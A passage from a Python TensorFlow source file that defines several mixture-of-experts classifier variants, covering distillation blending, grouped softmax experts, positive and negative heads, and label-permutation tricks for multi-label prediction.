gating_distribution[:, :num_mixtures] * expert_distribution, 1)
probabilities_by_class_and_batch = tf.reshape(probabilities_by_class_and_batch,
[-1, vocab_size_2])
final_probabilities = tf.concat((probabilities_by_distill, probabilities_by_class_and_batch), axis=1)
final_probabilities = final_probabilities*FLAGS.ensemble_w + distill_labels*(1.0-FLAGS.ensemble_w)
return {"predictions": final_probabilities, "predictions_class": probabilities_by_class}
class MoeDistillSplit4Model(models.BaseModel):
"""A softmax over a mixture of logistic models (with L2 regularization)."""
def create_model(self,
model_input,
vocab_size,
distill_labels=None,
num_mixtures=None,
l2_penalty=1e-8,
**unused_params):
"""Creates a Mixture of (Logistic) Experts model.
The model consists of a per-class softmax distribution over a
configurable number of logistic classifiers. One of the classifiers in the
mixture is not trained, and always predicts 0.
Args:
model_input: 'batch_size' x 'num_features' matrix of input features.
vocab_size: The number of classes in the dataset.
num_mixtures: The number of mixtures (excluding a dummy 'expert' that
always predicts the non-existence of an entity).
l2_penalty: How much to penalize the squared magnitudes of parameter
values.
Returns:
A dictionary with a tensor containing the probability predictions of the
model in the 'predictions' key. The dimensions of the tensor are
batch_size x num_classes.
"""
num_mixtures = num_mixtures or FLAGS.moe_num_mixtures
bound = FLAGS.softmax_bound
vocab_size_1 = bound
vocab_size_2 = vocab_size - vocab_size_1
class_size = 256
probabilities_by_distill = distill_labels[:,:vocab_size_1]
probabilities_by_residual = distill_labels[:,vocab_size_1:]
gate_activations_1 = slim.fully_connected(
model_input,
vocab_size_1 * (num_mixtures + 1),
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="gates-1")
expert_activations_1 = slim.fully_connected(
model_input,
vocab_size_1 * num_mixtures,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="experts-1")
gating_distribution_1 = tf.nn.softmax(tf.reshape(
gate_activations_1,
[-1, num_mixtures + 1])) # (Batch * #Labels) x (num_mixtures + 1)
expert_distribution_1 = tf.nn.sigmoid(tf.reshape(
expert_activations_1,
[-1, num_mixtures])) # (Batch * #Labels) x num_mixtures
probabilities_by_class_and_batch_1 = tf.reduce_sum(
gating_distribution_1[:, :num_mixtures] * expert_distribution_1, 1)
probabilities_by_class_and_batch_1 = tf.reshape(probabilities_by_class_and_batch_1,
[-1, vocab_size_1])
probabilities_by_class = tf.concat((probabilities_by_class_and_batch_1, probabilities_by_residual), axis=1)
class_input = slim.fully_connected(
probabilities_by_distill,
class_size,
activation_fn=tf.nn.relu,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class_inputs")
model_input = tf.concat((model_input,class_input),axis=1)
gate_activations = slim.fully_connected(
model_input,
vocab_size_2 * (num_mixtures + 1),
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="gates")
expert_activations = slim.fully_connected(
model_input,
vocab_size_2 * num_mixtures,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="experts")
gating_distribution = tf.nn.softmax(tf.reshape(
gate_activations,
[-1, num_mixtures + 1])) # (Batch * #Labels) x (num_mixtures + 1)
expert_distribution = tf.nn.sigmoid(tf.reshape(
expert_activations,
[-1, num_mixtures])) # (Batch * #Labels) x num_mixtures
probabilities_by_class_and_batch = tf.reduce_sum(
gating_distribution[:, :num_mixtures] * expert_distribution, 1)
probabilities_by_class_and_batch = tf.reshape(probabilities_by_class_and_batch,
[-1, vocab_size_2])
final_probabilities = tf.concat((probabilities_by_distill, probabilities_by_class_and_batch), axis=1)
final_probabilities = final_probabilities*FLAGS.ensemble_w + distill_labels*(1.0-FLAGS.ensemble_w)
return {"predictions": final_probabilities, "predictions_class": probabilities_by_class}
class MoeSoftmaxModel(models.BaseModel):
"""A softmax over a mixture of logistic models (with L2 regularization)."""
def sub_model(self,
model_input,
vocab_size,
num_mixtures=None,
l2_penalty=1e-8,
name="",
**unused_params):
num_mixtures = num_mixtures or FLAGS.moe_num_mixtures
class_size = FLAGS.class_size
bound = FLAGS.softmax_bound
vocab_size_1 = bound
gate_activations = slim.fully_connected(
model_input,
vocab_size_1 * (num_mixtures + 1),
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="gates"+name)
expert_activations = slim.fully_connected(
model_input,
vocab_size_1 * num_mixtures,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="experts"+name)
gating_distribution = tf.nn.softmax(tf.reshape(
gate_activations,
[-1, num_mixtures + 1])) # (Batch * #Labels) x (num_mixtures + 1)
expert_distribution = tf.nn.sigmoid(tf.reshape(
expert_activations,
[-1, num_mixtures])) # (Batch * #Labels) x num_mixtures
probabilities_by_class_and_batch = tf.reduce_sum(
gating_distribution[:, :num_mixtures] * expert_distribution, 1)
probabilities_by_sigmoid = tf.reshape(probabilities_by_class_and_batch,
[-1, vocab_size_1])
vocab_size_2 = vocab_size - bound
class_size = vocab_size_2
channels = 1
probabilities_by_softmax = []
for i in range(channels):
if i<channels-1:
sub_vocab_size = class_size + 1
else:
sub_vocab_size = vocab_size_2 - (channels-1)*class_size + 1
gate_activations = slim.fully_connected(
model_input,
sub_vocab_size * (num_mixtures + 1),
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class_gates-%s" % i + name)
expert_activations = slim.fully_connected(
model_input,
sub_vocab_size * num_mixtures,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class_experts-%s" % i + name)
gating_distribution = tf.nn.softmax(tf.reshape(
gate_activations,
[-1, num_mixtures + 1])) # (Batch * #Labels) x (num_mixtures + 1)
expert_distribution = tf.nn.softmax(tf.reshape(
expert_activations,
[-1, sub_vocab_size, num_mixtures]),dim=1) # (Batch * #Labels) x num_mixtures
expert_distribution = tf.reshape(expert_distribution,[-1,num_mixtures])
probabilities_by_subvocab = tf.reduce_sum(
gating_distribution[:, :num_mixtures] * expert_distribution, 1)
probabilities_by_subvocab = tf.reshape(probabilities_by_subvocab,
[-1, sub_vocab_size])
probabilities_by_subvocab = probabilities_by_subvocab/tf.reduce_sum(probabilities_by_subvocab,axis=1,keep_dims=True)
if i==0:
probabilities_by_softmax = probabilities_by_subvocab[:,:-1]
else:
probabilities_by_softmax = tf.concat((probabilities_by_softmax, probabilities_by_subvocab[:,:-1]),axis=1)
probabilities_by_class = tf.concat((probabilities_by_sigmoid,probabilities_by_softmax),axis=1)
return probabilities_by_class
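  # sub_model output layout: the first FLAGS.softmax_bound labels are scored
  # by a sigmoid mixture-of-experts; the remaining labels by grouped softmax
  # mixtures, where each group carries one extra "none of this group" column
  # that is used for renormalization and then dropped.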
def create_model(self,
model_input,
vocab_size,
num_mixtures=None,
l2_penalty=1e-8,
**unused_params):
"""Creates a Mixture of (Logistic) Experts model.
The model consists of a per-class softmax distribution over a
configurable number of logistic classifiers. One of the classifiers in the
mixture is not trained, and always predicts 0.
Args:
model_input: 'batch_size' x 'num_features' matrix of input features.
vocab_size: The number of classes in the dataset.
num_mixtures: The number of mixtures (excluding a dummy 'expert' that
always predicts the non-existence of an entity).
l2_penalty: How much to penalize the squared magnitudes of parameter
values.
Returns:
A dictionary with a tensor containing the probability predictions of the
model in the 'predictions' key. The dimensions of the tensor are
batch_size x num_classes.
"""
shape = model_input.get_shape().as_list()[1]
class_size = FLAGS.class_size
probabilities_by_class = self.sub_model(model_input,vocab_size,name="pre")
probabilities_by_vocab = probabilities_by_class
vocab_input = model_input
for i in range(FLAGS.moe_layers):
class_input_1 = slim.fully_connected(
probabilities_by_vocab,
class_size,
activation_fn=tf.nn.elu,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class_inputs1-%s" % i)
class_input_2 = slim.fully_connected(
1-probabilities_by_vocab,
class_size,
activation_fn=tf.nn.elu,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class_inputs2-%s" % i)
class_input_1 = tf.nn.l2_normalize(class_input_1,dim=1)*tf.sqrt(tf.cast(class_size,dtype=tf.float32)/shape)
class_input_2 = tf.nn.l2_normalize(class_input_2,dim=1)*tf.sqrt(tf.cast(class_size,dtype=tf.float32)/shape)
vocab_input = tf.concat((vocab_input,class_input_1,class_input_2),axis=1)
probabilities_by_vocab = self.sub_model(vocab_input,vocab_size,name="-%s" % i)
if i<FLAGS.moe_layers-1:
probabilities_by_class = tf.concat((probabilities_by_class,probabilities_by_vocab),axis=1)
final_probabilities = probabilities_by_vocab
return {"predictions": final_probabilities, "predictions_class": probabilities_by_class}
class MoeNegativeModel(models.BaseModel):
"""A softmax over a mixture of logistic models (with L2 regularization)."""
def create_model(self,
model_input,
vocab_size,
num_mixtures=None,
l2_penalty=1e-8,
**unused_params):
"""Creates a Mixture of (Logistic) Experts model.
The model consists of a per-class softmax distribution over a
configurable number of logistic classifiers. One of the classifiers in the
mixture is not trained, and always predicts 0.
Args:
model_input: 'batch_size' x 'num_features' matrix of input features.
vocab_size: The number of classes in the dataset.
num_mixtures: The number of mixtures (excluding a dummy 'expert' that
always predicts the non-existence of an entity).
l2_penalty: How much to penalize the squared magnitudes of parameter
values.
Returns:
A dictionary with a tensor containing the probability predictions of the
model in the 'predictions' key. The dimensions of the tensor are
batch_size x num_classes.
"""
num_mixtures = num_mixtures or FLAGS.moe_num_mixtures
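# Two independent MoE heads are trained below: one scores evidence for each
# label ("pos") and one scores evidence against it ("neg"); the final output is
# the normalized ratio p = pos / (pos + neg + 1e-6).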
gate_activations = slim.fully_connected(
model_input,
vocab_size * (num_mixtures + 1),
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="gates_pos")
expert_activations = slim.fully_connected(
model_input,
vocab_size * num_mixtures,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="experts_pos")
gating_distribution = tf.nn.softmax(tf.reshape(
gate_activations,
[-1, num_mixtures + 1])) # (Batch * #Labels) x (num_mixtures + 1)
expert_distribution = tf.nn.sigmoid(tf.reshape(
expert_activations,
[-1, num_mixtures])) # (Batch * #Labels) x num_mixtures
probabilities_by_class_and_batch = tf.reduce_sum(
gating_distribution[:, :num_mixtures] * expert_distribution, 1)
final_probabilities_pos = tf.reshape(probabilities_by_class_and_batch,
[-1, vocab_size])
gate_activations = slim.fully_connected(
model_input,
vocab_size * (num_mixtures + 1),
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="gates_neg")
expert_activations = slim.fully_connected(
model_input,
vocab_size * num_mixtures,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="experts_neg")
gating_distribution = tf.nn.softmax(tf.reshape(
gate_activations,
[-1, num_mixtures + 1])) # (Batch * #Labels) x (num_mixtures + 1)
expert_distribution = tf.nn.sigmoid(tf.reshape(
expert_activations,
[-1, num_mixtures])) # (Batch * #Labels) x num_mixtures
probabilities_by_class_and_batch = tf.reduce_sum(
gating_distribution[:, :num_mixtures] * expert_distribution, 1)
final_probabilities_neg = tf.reshape(probabilities_by_class_and_batch,
[-1, vocab_size])
final_probabilities = final_probabilities_pos/(final_probabilities_pos + final_probabilities_neg + 1e-6)
return {"predictions": final_probabilities, "predictions_positive": final_probabilities_pos,
"predictions_negative": final_probabilities_neg}
class MoeMaxModel(models.BaseModel):
"""A softmax over a mixture of logistic models (with L2 regularization)."""
def create_model(self,
model_input,
vocab_size,
num_mixtures=None,
l2_penalty=1e-8,
**unused_params):
"""Creates a Mixture of (Logistic) Experts model.
The model consists of a per-class softmax distribution over a
configurable number of logistic classifiers. One of the classifiers in the
mixture is not trained, and always predicts 0.
Args:
model_input: 'batch_size' x 'num_features' matrix of input features.
vocab_size: The number of classes in the dataset.
num_mixtures: The number of mixtures (excluding a dummy 'expert' that
always predicts the non-existence of an entity).
l2_penalty: How much to penalize the squared magnitudes of parameter
values.
Returns:
A dictionary with a tensor containing the probability predictions of the
model in the 'predictions' key. The dimensions of the tensor are
batch_size x num_classes.
"""
num_mixtures = num_mixtures or FLAGS.moe_num_mixtures
gate_activations = slim.fully_connected(
model_input,
vocab_size * (num_mixtures+1),
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="gates")
expert_activations = slim.fully_connected(
model_input,
vocab_size*num_mixtures,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="experts")
expert_others = slim.fully_connected(
model_input,
vocab_size,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="others")
expert_activations = tf.reshape(expert_activations,[-1,vocab_size,num_mixtures])
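# Each mixture gets its own fixed random permutation of the label axis (seeded
# by the mixture index, so it is reproducible across runs). forward_indices
# applies the permutations; backward_indices undoes them after the grouped
# softmax below.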
forward_indices = []
backward_indices = []
for i in range(num_mixtures):
forward_indice = np.arange(vocab_size)
np.random.seed(i)
np.random.shuffle(forward_indice)
backward_indice = np.argsort(forward_indice,axis=None)
forward_indices.append(forward_indice)
backward_indices.append(backward_indice)
forward_indices = tf.constant(np.stack(forward_indices,axis=1),dtype=tf.int32)*num_mixtures + tf.reshape(tf.range(num_mixtures),[1,-1])
backward_indices = tf.constant(np.stack(backward_indices,axis=1),dtype=tf.int32)*num_mixtures + tf.reshape(tf.range(num_mixtures),[1,-1])
forward_indices = tf.stop_gradient(tf.reshape(forward_indices,[-1]))
backward_indices = tf.stop_gradient(tf.reshape(backward_indices,[-1]))
expert_activations = tf.transpose(tf.reshape(expert_activations,[-1,vocab_size*num_mixtures]))
expert_activations = tf.transpose(tf.gather(expert_activations,forward_indices))
expert_activations = tf.reshape(expert_activations,[-1,vocab_size,num_mixtures])
gating_distribution = tf.nn.softmax(tf.reshape(
gate_activations,
[-1, num_mixtures+1])) # (Batch * #Labels) x (num_mixtures + 1)
expert_softmax = tf.transpose(expert_activations,perm=[0,2,1])
expert_softmax = tf.concat((tf.reshape(expert_softmax,[-1,num_mixtures]),tf.reshape(expert_others,[-1,1])),axis=1)
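# Within each permuted ordering, labels are processed in blocks of num_mixtures,
# and every block is joined with one logit from the shared "others" head, so the
# softmax below can assign mass to "none of this block".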
expert_distribution = tf.nn.softmax(tf.reshape(
expert_softmax,
[-1, num_mixtures+1])) # (Batch * #Labels) x (num_mixtures + 1)
expert_distribution = tf.reshape(expert_distribution[:,:num_mixtures],[-1,num_mixtures,vocab_size])
expert_distribution = tf.reshape(tf.transpose(expert_distribution,perm=[0,2,1]),[-1,vocab_size*num_mixtures])
expert_distribution = tf.transpose(tf.gather(tf.transpose(expert_distribution),backward_indices))
expert_distribution = tf.reshape(expert_distribution,[-1,num_mixtures])
probabilities_by_class_and_batch = tf.reduce_sum(gating_distribution[:, :num_mixtures] * expert_distribution, 1)
final_probabilities = tf.reshape(probabilities_by_class_and_batch,[-1, vocab_size])
final_probabilities_experts = tf.reshape(expert_distribution,[-1, vocab_size, num_mixtures])
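# Optional output reordering; labels_ordered.out / labels_unordered.out are
# assumed to contain a permutation of the label indices, one integer per line.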
if FLAGS.moe_method=="ordered":
seq = np.loadtxt("labels_ordered.out")
tf_seq = tf.constant(seq,dtype=tf.int32)
final_probabilities = tf.gather(tf.transpose(final_probabilities),tf_seq)
final_probabilities = tf.transpose(final_probabilities)
elif FLAGS.moe_method=="unordered":
seq = np.loadtxt("labels_unordered.out")
tf_seq = tf.constant(seq,dtype=tf.int32)
final_probabilities = tf.gather(tf.transpose(final_probabilities),tf_seq)
final_probabilities = tf.transpose(final_probabilities)
return {"predictions": final_probabilities, "predictions_experts": final_probabilities_experts}
class MoeMaxMixModel(models.BaseModel):
"""A softmax over a mixture of logistic models (with L2 regularization)."""
def create_model(self,
model_input,
vocab_size,
num_mixtures=None,
l2_penalty=1e-8,
**unused_params):
"""Creates a Mixture of (Logistic) Experts model.
The model consists of a per-class softmax distribution over a
configurable number of logistic classifiers. One of the classifiers in the
mixture is not trained, and always predicts 0.
Args:
model_input: 'batch_size' x 'num_features' matrix of input features.
vocab_size: The number of classes in the dataset.
num_mixtures: The number of mixtures (excluding a dummy 'expert' that
always predicts the non-existence of an entity).
l2_penalty: How much to penalize the squared magnitudes of parameter
values.
Returns:
A dictionary with a tensor containing the probability predictions of the
model in the 'predictions' key. The dimensions of the tensor are
batch_size x num_classes.
"""
num_mixtures = num_mixtures or FLAGS.moe_num_mixtures
class_size = 25
class_input = slim.fully_connected(
model_input,
model_input.get_shape().as_list()[1],
activation_fn=tf.nn.relu,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class_inputs")
class_gate_activations = slim.fully_connected(
class_input,
class_size * (num_mixtures + 1),
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class_gates")
class_expert_activations = slim.fully_connected(
class_input,
class_size * num_mixtures,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class_experts")
class_gating_distribution = tf.nn.softmax(tf.reshape(
class_gate_activations,
[-1, num_mixtures + 1])) # (Batch * #Labels) x (num_mixtures + 1)
class_expert_distribution = tf.nn.sigmoid(tf.reshape(
class_expert_activations,
[-1, num_mixtures])) # (Batch * #Labels) x num_mixtures
probabilities_by_class = tf.reduce_sum(
class_gating_distribution[:, :num_mixtures] * class_expert_distribution, 1)
probabilities_by_class = tf.reshape(probabilities_by_class,
[-1, class_size])
vocab_input = tf.concat((model_input,probabilities_by_class), axis=1)
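# The 25-dim class bottleneck serves as a coarse label summary and is
# concatenated to the raw features, so the grouped-softmax MoE below can
# condition on it.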
gate_activations = slim.fully_connected(
vocab_input,
vocab_size * (num_mixtures+1),
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="gates")
expert_activations = slim.fully_connected(
vocab_input,
vocab_size*num_mixtures,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="experts")
expert_others = slim.fully_connected(
vocab_input,
vocab_size,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="others")
expert_activations = tf.reshape(expert_activations,[-1,vocab_size,num_mixtures])
forward_indices = []
backward_indices = []
for i in range(num_mixtures):
forward_indice = np.arange(vocab_size)
np.random.seed(i)
np.random.shuffle(forward_indice)
backward_indice = np.argsort(forward_indice,axis=None)
forward_indices.append(forward_indice)
backward_indices.append(backward_indice)
forward_indices = tf.constant(np.stack(forward_indices,axis=1),dtype=tf.int32)*num_mixtures + tf.reshape(tf.range(num_mixtures),[1,-1])
backward_indices = tf.constant(np.stack(backward_indices,axis=1),dtype=tf.int32)*num_mixtures + tf.reshape(tf.range(num_mixtures),[1,-1])
forward_indices = tf.stop_gradient(tf.reshape(forward_indices,[-1]))
backward_indices = tf.stop_gradient(tf.reshape(backward_indices,[-1]))
expert_activations = tf.transpose(tf.reshape(expert_activations,[-1,vocab_size*num_mixtures]))
expert_activations = tf.transpose(tf.gather(expert_activations,forward_indices))
expert_activations = tf.reshape(expert_activations,[-1,vocab_size,num_mixtures])
gating_distribution = tf.nn.softmax(tf.reshape(
gate_activations,
[-1, num_mixtures+1])) # (Batch * #Labels) x (num_mixtures + 1)
expert_softmax = tf.transpose(expert_activations,perm=[0,2,1])
expert_softmax = tf.concat((tf.reshape(expert_softmax,[-1,num_mixtures]),tf.reshape(expert_others,[-1,1])),axis=1)
expert_distribution = tf.nn.softmax(tf.reshape(
expert_softmax,
[-1, num_mixtures+1])) # (Batch * #Labels) x (num_mixtures + 1)
expert_distribution = tf.reshape(expert_distribution[:,:num_mixtures],[-1,num_mixtures,vocab_size])
expert_distribution = tf.reshape(tf.transpose(expert_distribution,perm=[0,2,1]),[-1,vocab_size*num_mixtures])
expert_distribution = tf.transpose(tf.gather(tf.transpose(expert_distribution),backward_indices))
expert_distribution = tf.reshape(expert_distribution,[-1,num_mixtures])
probabilities_by_class_and_batch = tf.reduce_sum(gating_distribution[:, :num_mixtures] * expert_distribution, 1)
final_probabilities = tf.reshape(probabilities_by_class_and_batch,[-1, vocab_size])
return {"predictions": final_probabilities, "predictions_class": probabilities_by_class}
class MoeKnowledgeModel(models.BaseModel):
"""A softmax over a mixture of logistic models (with L2 regularization)."""
def create_model(self,
model_input,
vocab_size,
num_mixtures=None,
l2_penalty=1e-8,
**unused_params):
"""Creates a Mixture of (Logistic) Experts model.
The model consists of a per-class softmax distribution over a
configurable number of logistic classifiers. One of the classifiers in the
mixture is not trained, and always predicts 0.
Args:
model_input: 'batch_size' x 'num_features' matrix of input features.
vocab_size: The number of classes in the dataset.
num_mixtures: The number of mixtures (excluding a dummy 'expert' that
always predicts the non-existence of an entity).
l2_penalty: How much to penalize the squared magnitudes of parameter
values.
Returns:
A dictionary with a tensor containing the probability predictions of the
model in the 'predictions' key. The dimensions of the tensor are
batch_size x num_classes.
"""
num_mixtures = num_mixtures or FLAGS.moe_num_mixtures
class_size = FLAGS.class_size
shape = model_input.get_shape().as_list()[1]
seq = np.loadtxt(FLAGS.class_file)
tf_seq = tf.constant(seq,dtype=tf.float32)
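# FLAGS.class_file is assumed to hold a vocab_size x vocab_size label-relation
# matrix (e.g. label co-occurrence statistics); multiplying predictions by it
# propagates probability mass to related labels before each refinement pass.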
gate_activations = slim.fully_connected(
model_input,
vocab_size * (num_mixtures + 1),
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="gates")
expert_activations = slim.fully_connected(
model_input,
vocab_size * num_mixtures,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="experts")
gating_distribution = tf.nn.softmax(tf.reshape(
gate_activations,
[-1, num_mixtures + 1])) # (Batch * #Labels) x (num_mixtures + 1)
expert_distribution = tf.nn.sigmoid(tf.reshape(
expert_activations,
[-1, num_mixtures])) # (Batch * #Labels) x num_mixtures
probabilities_by_class = tf.reduce_sum(
gating_distribution[:, :num_mixtures] * expert_distribution, 1)
probabilities_by_class = tf.reshape(probabilities_by_class,
[-1, vocab_size])
probabilities_by_vocab = probabilities_by_class
vocab_input = model_input
for i in range(FLAGS.moe_layers):
class_input_1 = slim.fully_connected(
probabilities_by_vocab,
class_size,
activation_fn=tf.nn.elu,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class_inputs1-%s" % i)
class_input_2 = tf.matmul(probabilities_by_vocab,tf_seq)
class_input_2 = slim.fully_connected(
class_input_2,
class_size,
activation_fn=tf.nn.elu,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class_inputs2-%s" % i)
class_input_1 = tf.nn.l2_normalize(class_input_1,dim=1)*tf.sqrt(tf.cast(class_size,dtype=tf.float32)/shape)
class_input_2 = tf.nn.l2_normalize(class_input_2,dim=1)*tf.sqrt(tf.cast(class_size,dtype=tf.float32)/shape)
vocab_input = tf.concat((vocab_input,class_input_1,class_input_2),axis=1)
gate_activations = slim.fully_connected(
vocab_input,
vocab_size * (num_mixtures + 1),
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="gates-%s" % i)
expert_activations = slim.fully_connected(
vocab_input,
vocab_size * num_mixtures,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="experts-%s" % i)
gating_distribution = tf.nn.softmax(tf.reshape(
gate_activations,
[-1, num_mixtures + 1])) # (Batch * #Labels) x (num_mixtures + 1)
expert_distribution = tf.nn.sigmoid(tf.reshape(
expert_activations,
[-1, num_mixtures])) # (Batch * #Labels) x num_mixtures
probabilities_by_vocab = tf.reduce_sum(
gating_distribution[:, :num_mixtures] * expert_distribution, 1)
probabilities_by_vocab = tf.reshape(probabilities_by_vocab,
[-1, vocab_size])
if i<FLAGS.moe_layers-1:
probabilities_by_class = tf.concat((probabilities_by_class,probabilities_by_vocab),axis=1)
final_probabilities = probabilities_by_vocab
return {"predictions": final_probabilities, "predictions_class": probabilities_by_class}
class MoeMixModel(models.BaseModel):
"""A softmax over a mixture of logistic models (with L2 regularization)."""
def create_model(self,
model_input,
vocab_size,
num_mixtures=None,
l2_penalty=1e-8,
**unused_params):
"""Creates a Mixture of (Logistic) Experts model.
The model consists of a per-class softmax distribution over a
configurable number of logistic classifiers. One of the classifiers in the
mixture is not trained, and always predicts 0.
Args:
model_input: 'batch_size' x 'num_features' matrix of input features.
vocab_size: The number of classes in the dataset.
num_mixtures: The number of mixtures (excluding a dummy 'expert' that
always predicts the non-existence of an entity).
l2_penalty: How much to penalize the squared magnitudes of parameter
values.
Returns:
A dictionary with a tensor containing the probability predictions of the
model in the 'predictions' key. The dimensions of the tensor are
batch_size x num_classes.
"""
num_mixtures = num_mixtures or FLAGS.moe_num_mixtures
class_size = FLAGS.encoder_size
class_input = slim.fully_connected(
model_input,
model_input.get_shape().as_list()[1],
activation_fn=tf.nn.relu,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class_inputs")
class_gate_activations = slim.fully_connected(
class_input,
class_size * (num_mixtures + 1),
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class_gates")
class_expert_activations = slim.fully_connected(
class_input,
class_size * num_mixtures,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class_experts")
class_gating_distribution = tf.nn.softmax(tf.reshape(
class_gate_activations,
[-1, num_mixtures + 1])) # (Batch * #Labels) x (num_mixtures + 1)
class_expert_distribution = tf.nn.sigmoid(tf.reshape(
class_expert_activations,
[-1, num_mixtures])) # (Batch * #Labels) x num_mixtures
probabilities_by_class = tf.reduce_sum(
class_gating_distribution[:, :num_mixtures] * class_expert_distribution, 1)
probabilities_by_class = tf.reshape(probabilities_by_class,
[-1, class_size])
vocab_input = tf.concat((model_input, probabilities_by_class), axis=1)
gate_activations = slim.fully_connected(
vocab_input,
vocab_size * (num_mixtures + 1),
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="gates")
expert_activations = slim.fully_connected(
vocab_input,
vocab_size * num_mixtures,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="experts")
gating_distribution = tf.nn.softmax(tf.reshape(
gate_activations,
[-1, num_mixtures + 1])) # (Batch * #Labels) x (num_mixtures + 1)
expert_distribution = tf.nn.sigmoid(tf.reshape(
expert_activations,
[-1, num_mixtures])) # (Batch * #Labels) x num_mixtures
probabilities_by_vocab = tf.reduce_sum(
gating_distribution[:, :num_mixtures] * expert_distribution, 1)
probabilities_by_vocab = tf.reshape(probabilities_by_vocab,
[-1, vocab_size])
final_probabilities = probabilities_by_vocab
return {"predictions": final_probabilities, "predictions_class": probabilities_by_class}
class MoeMixExtendModel(models.BaseModel):
"""A softmax over a mixture of logistic models (with L2 regularization)."""
def create_model(self,
model_input,
vocab_size,
num_mixtures=None,
l2_penalty=1e-8,
**unused_params):
"""Creates a Mixture of (Logistic) Experts model.
The model consists of a per-class softmax distribution over a
configurable number of logistic classifiers. One of the classifiers in the
mixture is not trained, and always predicts 0.
Args:
model_input: 'batch_size' x 'num_features' matrix of input features.
vocab_size: The number of classes in the dataset.
num_mixtures: The number of mixtures (excluding a dummy 'expert' that
always predicts the non-existence of an entity).
l2_penalty: How much to penalize the squared magnitudes of parameter
values.
Returns:
A dictionary with a tensor containing the probability predictions of the
model in the 'predictions' key. The dimensions of the tensor are
batch_size x num_classes.
"""
num_mixtures = num_mixtures or FLAGS.moe_num_mixtures
num_extends = FLAGS.moe_num_extend
class_size = FLAGS.encoder_size
model_input_stop = tf.stop_gradient(model_input)
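# The class branch runs on a stop-gradient copy of the input, so its gradients
# do not flow back into the upstream feature extractor shared with the main MoE.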
class_input = slim.fully_connected(
model_input_stop,
model_input.get_shape().as_list()[1],
activation_fn=tf.nn.relu,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class_inputs")
class_gate_activations = slim.fully_connected(
class_input,
class_size * (num_mixtures + 1),
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class_gates")
class_expert_activations = slim.fully_connected(
class_input,
class_size * num_mixtures,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class_experts")
class_gating_distribution = tf.nn.softmax(tf.reshape(
class_gate_activations,
[-1, num_mixtures + 1])) # (Batch * #Labels) x (num_mixtures + 1)
class_expert_distribution = tf.nn.sigmoid(tf.reshape(
class_expert_activations,
[-1, num_mixtures])) # (Batch * #Labels) x num_mixtures
probabilities_by_class = tf.reduce_sum(
class_gating_distribution[:, :num_mixtures] * class_expert_distribution, 1)
probabilities_by_class = tf.reshape(probabilities_by_class,
[-1, class_size])
vocab_input = tf.concat((model_input, probabilities_by_class),axis=1)
gate_activations = slim.fully_connected(
vocab_input,
vocab_size * (num_mixtures + 1),
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="gates")
expert_activations = slim.fully_connected(
vocab_input,
vocab_size * num_mixtures,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="experts")
gating_distribution = tf.nn.softmax(tf.reshape(
gate_activations,
[-1, num_mixtures + 1])) # (Batch * #Labels) x (num_mixtures + 1)
expert_distribution = tf.nn.sigmoid(tf.reshape(
expert_activations,
[-1, num_mixtures])) # (Batch * #Labels) x num_mixtures
probabilities_by_vocab = tf.reduce_sum(
gating_distribution[:, :num_mixtures] * expert_distribution, 1)
final_probabilities = tf.reduce_max(tf.reshape(probabilities_by_vocab,
[-1, num_extends, vocab_size]),axis=1)
probabilities_by_class = tf.reduce_mean(tf.reshape(probabilities_by_class,
[-1, num_extends, class_size]),axis=1)
return {"predictions": final_probabilities, "predictions_class": probabilities_by_class}
class MoeMix2Model(models.BaseModel):
"""A softmax over a mixture of logistic models (with L2 regularization)."""
def create_model(self,
model_input,
vocab_size,
num_mixtures=None,
